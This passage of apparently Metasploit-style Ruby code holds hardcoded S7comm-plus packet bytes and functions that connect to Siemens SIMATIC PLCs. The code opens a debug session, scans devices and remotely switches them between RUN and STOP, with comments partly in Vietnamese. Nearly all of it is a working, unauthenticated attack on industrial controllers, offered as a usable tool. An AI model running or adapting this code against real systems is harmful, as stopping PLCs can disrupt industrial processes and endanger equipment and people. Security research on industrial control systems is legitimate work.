						"\x0f\x53\x49\x4d\x41\x54\x49\x43"+
						"\x2d\x52\x4f\x4f\x54\x2d\x45\x53"+
						"\xc0\x01\x0a",

                 		#session debug
               			"\x03\x00\x00\xc0\x02\xf0\x80\x72"+
               			"\x01\x00\xb1\x31\x00\x00\x04\xca"+
               			"\x00\x00\x00\x02\x00\x00\x01\x20"+
               			"\x36\x00\x00\x01\x1d\x00\x04\x00"+
               			"\x00\x00\x00\x00\xa1\x00\x00\x00"+
               			"\xd3\x82\x1f\x00\x00\xa3\x81\x69"+
               			"\x00\x15\x16\x53\x65\x72\x76\x65"+
               			"\x72\x53\x65\x73\x73\x69\x6f\x6e"+
               			"\x5f\x43\x43\x39\x43\x33\x39\x33"+
               			"\x44\xa3\x82\x21\x00\x15\x0b\x31"+
               			"\x3a\x3a\x3a\x36\x2e\x30\x3a\x3a"+
               			"\x3a\x12\xa3\x82\x28\x00\x15\x0d"+
               			"\x4f\x4d\x53\x2b\x20\x44\x65\x62"+
               			"\x75\x67\x67\x65\x72\xa3\x82\x29"+
               			"\x00\x15\x00\xa3\x82\x2a\x00\x15"+
               			"\x00\xa3\x82\x2b\x00\x04\x84\x80"+
               			"\x80\x80\x00\xa3\x82\x2c\x00\x12"+
               			"\x11\xe1\xa3\x00\xa3\x82\x2d\x00"+
               			"\x15\x00\xa1\x00\x00\x00\xd3\x81"+
               			"\x7f\x00\x00\xa3\x81\x69\x00\x15"+
               			"\x15\x53\x75\x62\x73\x63\x72\x69"+
               			"\x70\x74\x69\x6f\x6e\x43\x6f\x6e"+
               			"\x74\x61\x69\x6e\x65\x72\xa2\xa2"+
               			"\x00\x00\x00\x00\x72\x01\x00\x00",
                		
						######
						"\x03\x00\x00\x77\x02\xf0\x80\x72"+#p1
						"\x02\x00\x68\x31\x00\x00\x05\x42"+
						"\x00\x00\x00\x03\x00\x00\x03\xff"+
						"\x34\x00\x00\x03\xff\x01\x01\x82"+
						"\x32\x01\x00\x17\x00\x00\x01\x3a"+
						"\x82\x3b\x00\x04\x81\x40\x82\x3c"+
						"\x00\x04\x81\x40\x82\x3d\x00\x04"+
						"\x00\x82\x3e\x00\x04\x84\x80\xc0"+
						"\x40\x82\x3f\x00\x15\x00\x82\x40"+
						"\x00\x15\x05\x32\x3b"+
						"\x35\x34\x34\x82\x41"+
						"\x00\x03\x00\x03\x00\x00\x00\x00"+#2
						"\x04\xe8\x89\x69\x00\x12\x00\x00"+
						"\x00\x00\x89\x6a\x00\x13\x00\x89"+
						"\x6b\x00\x04\x00\x00\x00\x00\x00"+
						"\x00\x72\x02\x00\x00",
						#unknown 
                		"\x03\x00\x00\x07\x02\xf0\x00",
                		#bat dau qua trinh diag
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x05\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x01\x00\x00\x00"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
                		#tiep tuc diag
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x06\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x02\x00\x01\x01"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
#truoc start-stop
                		"\x03\x00\x00\x42\x02\xf0\x80"+
                		"\x72\x02\x00\x33\x31\x00\x00\x04"+
                		"\xfc\x00\x00\x00\x07\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x02\x91"+
                		"\x3d\x9b\x1e\x00\x00\x04\xe8\x89"+
                		"\x69\x00\x12\x00\x00\x00\x00\x89"+
                		"\x6a\x00\x13\x00\x89\x6b\x00\x04"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
#start
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x03\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
#stop
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x01\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
			]
		return packets
	end
#############################################################################
	def start_PLC(scr)
		print_good "mode select: START"
		sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[7].gsub("\xff",[scr].pack("c")))#send hello plc
		#sock.get_once()
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->RUN"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def stop_PLC(scr)
		print_good "mode select: STOP"
		sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[8].gsub("\xff",[scr].pack("c")))#send hello plc
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->STOP"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def PLC_SCAN(ip)
		sock.put(packet[0])#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[1])#xin 1 session debug
		dt=sock.get_once(-1, sock.def_read_timeout)
		sock.put(packet[3])#send hello plc
		sock.get_once()
		arr=dt.split(/;/)
		print_good "#{ip.to_s}:  #{arr[2].to_s} : #{arr[3][0..3].to_s}"
	end
#############################################################################
	def run_host(ip)
		mode=datastore['MODE']
		func=datastore['FUNC']
		connect()
		if mode !="scan" && mode!="SCAN" 
			sock.put(packet[0])#send hello plc
			sock.get_once()
			sleep(0.05)
			sock.put(packet[1])#xin 1 session debug
			dt=sock.get_once(-1, sock.def_read_timeout)
			sock.put(packet[3])#send hello plc
			sock.get_once()
			arr=dt.split(/;/)
			print_good "#{arr[2].to_s} : #{arr[3][0..3].to_s}"
			data=dt.unpack("C*")
			a= (data[24]).to_i
			b= (data[26]).to_i
			scr=a|128
			scr1=b|128
			#print_line scr.to_s
			if arr.length.to_i ==5 #neu lay duoc session
				session_i= arr[4][0..4].each_byte.map { |dt| '\x%02x' % dt.to_i }.join
				pac=packet[2].gsub("\xff",[scr].pack("c"))
				sock.put(pac.gsub("\x35\x34\x34\x82\x41", arr[4][0..4]))
			end
			sock.put(packet[3])#send uknown packet to plc
			sock.get_once()
			case mode
				when "START" , "start"
					start_PLC(scr)
				when "STOP" , "stop"
					stop_PLC(scr)
				else
					print_error("Invalid MODE")
			end
		else
			PLC_SCAN(ip)
		end
		disconnect()
	end
end